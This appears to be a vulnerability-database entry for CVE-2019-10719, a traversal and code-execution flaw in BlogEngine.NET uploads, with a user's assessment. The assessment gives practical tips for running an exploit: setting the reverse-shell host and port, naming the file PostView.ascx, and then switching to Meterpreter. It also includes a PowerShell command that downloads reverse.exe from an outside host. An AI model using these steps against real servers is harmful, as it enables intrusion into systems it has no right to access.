Unknown
CVE-2019-10719
Unknown
(1 user assessed)
Unknown
(1 user assessed)Unknown
Unknown
Unknown
Description
BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714.
Add Assessment
Technical Analysis
This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.
Things to keep in mind:
-You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(”\(LHOST", \)LPORT). Set the host and port accordingly.
-I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others, this exploit creates a very unstable shell.
-The script should be named PostView.ascx
Moving from here:
-It is recommended to upgrade to a different shell as soon as possible.
-I have had the most luck with Meterpreter. Creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell. –> powershell Invoke-WebRequest -Uri http://10.10.10.10:8888/reverse.exe -Outfile reverse.exe
CVSS V3 Severity and Metrics
General Information
Vendors
- dotnetblogengine
Products
- blogengine.net
References
